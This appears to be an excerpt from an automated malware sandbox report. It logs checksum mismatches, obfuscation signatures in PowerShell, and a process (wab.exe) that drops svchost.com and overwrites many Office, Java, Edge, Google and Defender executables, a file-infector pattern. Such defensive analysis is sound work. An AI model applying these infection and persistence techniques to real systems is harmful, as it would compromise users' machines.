Source: PerfBoost.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x6ed59
Source: joticon.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0xbd8e2
Source: MpCmdRun.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x19b52e
Source: aimgr.exe0.9.dr Static PE information: real checksum: 0x8a074 should be: 0x2e51b
Source: SQLDumper.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x49b60
Source: Au3Check.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x4ace1
Source: AppSharingHookController64.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x20765
Source: Aut2exe_x64.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x1c7652
Source: Microsoft.Mashup.Container.Loader.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x218c6
Source: AutoIt3Help.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x2942f
Source: Uninstall.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x1d811
Source: armsvc.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x38ee8
Source: officeappguardwin32.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x1ea61e
Source: jusched.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0xc76e3
Source: AppVDllSurrogate32.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x3d892
Source: javaws.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x6c99c
Source: OcPubMgr.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x182a45
Source: msoev.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x268d3
Source: accicons.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x4235e8
Source: mpextms.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0xee9bf
Source: jaureg.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x95cbf
Source: OfficeScrSanBroker.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0xc392a
Source: javaw.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x5043b
Source: OfficeScrBroker.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0xa8883
Source: MsMpEng.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x39d03
Source: aimgr.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x3b0de
Source: SciTE.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x25609f
Source: java.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x5013a
Source: Au3Info.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x3d6d8
Source: ConfigSecurityPolicy.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x8624f
Source: MpCopyAccelerator.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x3e54a
Source: OLicenseHeartbeat.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0xb8fc4
Source: AutoIt3_x64.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x11706f
Source: MpCmdRun.exe0.9.dr Static PE information: real checksum: 0x8a074 should be: 0x146cda
Source: UcMapi.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x132706
Source: Wordconv.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x1f925
Source: AdobeARMHelper.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x64c50
Source: Common.DBConnection.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x2153c
Source: SDXHelper.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x38c81
Source: upx.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x5c64b
Source: GoogleCrashHandler.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x60b44
Source: NisSrv.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x307019
Source: AppVDllSurrogate.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x3d892
Source: VC_redist.x64.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0xaff0b
Source: AppSharingHookController.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x25428
Source: GoogleCrashHandler64.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x739bf
Source: Integrator.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x44ae38
Source: AppVLP.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x710ec
Source: AppVDllSurrogate64.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x4ec22
Source: dbcicons.exe.9.dr Static PE information: real checksum: 0x8a074 should be: 0x2bad0
PE file contains sections with non-standard names
Source: AppVDllSurrogate.exe.9.dr Static PE information: section name: .didat
Source: msoev.exe.9.dr Static PE information: section name: .didat
Source: OcPubMgr.exe.9.dr Static PE information: section name: .didat
Source: officeappguardwin32.exe.9.dr Static PE information: section name: .didat
Source: AppVDllSurrogate32.exe.9.dr Static PE information: section name: .didat
Source: OfficeScrBroker.exe.9.dr Static PE information: section name: .didat
Source: AppVDllSurrogate64.exe.9.dr Static PE information: section name: .didat
Source: OfficeScrSanBroker.exe.9.dr Static PE information: section name: .didat
Source: AppVLP.exe.9.dr Static PE information: section name: .didat
Source: Integrator.exe.9.dr Static PE information: section name: .didat
Source: Microsoft.Mashup.Container.Loader.exe.9.dr Static PE information: section name: .didat
Source: AppSharingHookController.exe.9.dr Static PE information: section name: .didat
Source: Common.DBConnection.exe.9.dr Static PE information: section name: .didat
Source: PerfBoost.exe.9.dr Static PE information: section name: .didat
Source: SDXHelper.exe.9.dr Static PE information: section name: .didat
Source: chrome.exe.9.dr Static PE information: section name: .didat
Source: MpCmdRun.exe.9.dr Static PE information: section name: .didat
Source: MpDlpCmd.exe.9.dr Static PE information: section name: .didat
Source: mpextms.exe.9.dr Static PE information: section name: .didat
Source: MsMpEng.exe.9.dr Static PE information: section name: .didat
Source: NisSrv.exe.9.dr Static PE information: section name: .didat
Source: MpCmdRun.exe0.9.dr Static PE information: section name: .didat
Source: VC_redist.x64.exe.9.dr Static PE information: section name: .didat
Source: UcMapi.exe.9.dr Static PE information: section name: .didat
Source: Wordconv.exe.9.dr Static PE information: section name: .didat
Source: ai.exe.9.dr Static PE information: section name: .didat
Source: aimgr.exe.9.dr Static PE information: section name: .didat
Source: integrator.exe.9.dr Static PE information: section name: .didat
Source: ConfigSecurityPolicy.exe.9.dr Static PE information: section name: .didat
Source: MpCopyAccelerator.exe.9.dr Static PE information: section name: .didat
Source: Au3Check.exe.9.dr Static PE information: section name: .didat
Source: Au3Info.exe.9.dr Static PE information: section name: .didat
Source: Au3Info_x64.exe.9.dr Static PE information: section name: .didat
Source: Aut2exe.exe.9.dr Static PE information: section name: .didat
Source: Aut2exe_x64.exe.9.dr Static PE information: section name: .didat
Source: upx.exe.9.dr Static PE information: section name: .didat
Source: AutoIt3Help.exe.9.dr Static PE information: section name: .didat
Source: ai.exe0.9.dr Static PE information: section name: .didat
Source: aimgr.exe0.9.dr Static PE information: section name: .didat
Source: AutoIt3_x64.exe.9.dr Static PE information: section name: .didat
Source: SciTE.exe.9.dr Static PE information: section name: .didat
Source: Uninstall.exe.9.dr Static PE information: section name: .didat
Source: AdobeARMHelper.exe.9.dr Static PE information: section name: .didat
Source: armsvc.exe.9.dr Static PE information: section name: .didat
Source: jaureg.exe.9.dr Static PE information: section name: .didat
Source: jucheck.exe.9.dr Static PE information: section name: .didat
Source: jusched.exe.9.dr Static PE information: section name: .didat
Source: VSTOInstaller.exe.9.dr Static PE information: section name: .didat
Source: OLicenseHeartbeat.exe.9.dr Static PE information: section name: .didat
Source: AppSharingHookController64.exe.9.dr Static PE information: section name: .didat
Source: SQLDumper.exe.9.dr Static PE information: section name: .didat
Source: accicons.exe.9.dr Static PE information: section name: .didat
Source: dbcicons.exe.9.dr Static PE information: section name: .didat
Source: grv_icons.exe.9.dr Static PE information: section name: .didat
Source: joticon.exe.9.dr Static PE information: section name: .didat
Source: lyncicon.exe.9.dr Static PE information: section name: .didat
Source: java.exe.9.dr Static PE information: section name: .didat
Source: javaw.exe.9.dr Static PE information: section name: .didat
Source: javaws.exe.9.dr Static PE information: section name: .didat
Source: GoogleCrashHandler.exe.9.dr Static PE information: section name: .didat
Source: GoogleCrashHandler64.exe.9.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F174FB push ebx; iretd 2_2_00007FF848F1756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F1756B push ebx; iretd 2_2_00007FF848F1756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F100BD pushad ; iretd 2_2_00007FF848F100C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7A58D pushad ; ret 6_2_04E7A59B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7A56A pushad ; ret 6_2_04E7A56B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7A518 pushad ; ret 6_2_04E7A53B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7E3B0 push eax; retf 6_2_04E7E3B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7AFD5 push ebp; ret 6_2_04E7B033
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7AFB5 push esi; ret 6_2_04E7AFD3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7AF85 push esi; ret 6_2_04E7AF93
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E70F88 push eax; ret 6_2_04E70F92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7AF95 push ebp; ret 6_2_04E7B033
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7AF65 push esi; ret 6_2_04E7AF83
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7AF62 push esi; ret 6_2_04E7AF63
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E70F68 push eax; ret 6_2_04E70F72
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E70F78 push eax; ret 6_2_04E70F82
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E70F5D push eax; ret 6_2_04E70F62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E76920 pushfd ; ret 6_2_04E76933
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7F72D push cs; ret 6_2_04E7F73B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7B0E5 push esp; ret 6_2_04E7B133
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7B0D5 push ebp; ret 6_2_04E7B0E3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7B0B5 push ebp; ret 6_2_04E7B0D3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7B085 push ebp; ret 6_2_04E7B093
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7B065 push ebp; ret 6_2_04E7B083
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7B062 push ebp; ret 6_2_04E7B063
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7B035 push esp; ret 6_2_04E7B133
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7B035 push esp; ret 6_2_04E7B173
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_04E7B162 push esp; ret 6_2_04E7B163
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_07A50638 push eax; mov dword ptr [esp], ecx 6_2_07A50AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_07A50AB8 push eax; mov dword ptr [esp], ecx 6_2_07A50AC4

Persistence and Installation Behavior
barindex
Drops PE files with a suspicious file extension
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com Jump to dropped file
Drops executable to a common third party application directory
Source: C:\Program Files (x86)\Windows Mail\wab.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Infects executable files (exe, dll, sys, html)
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe System file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to behavior
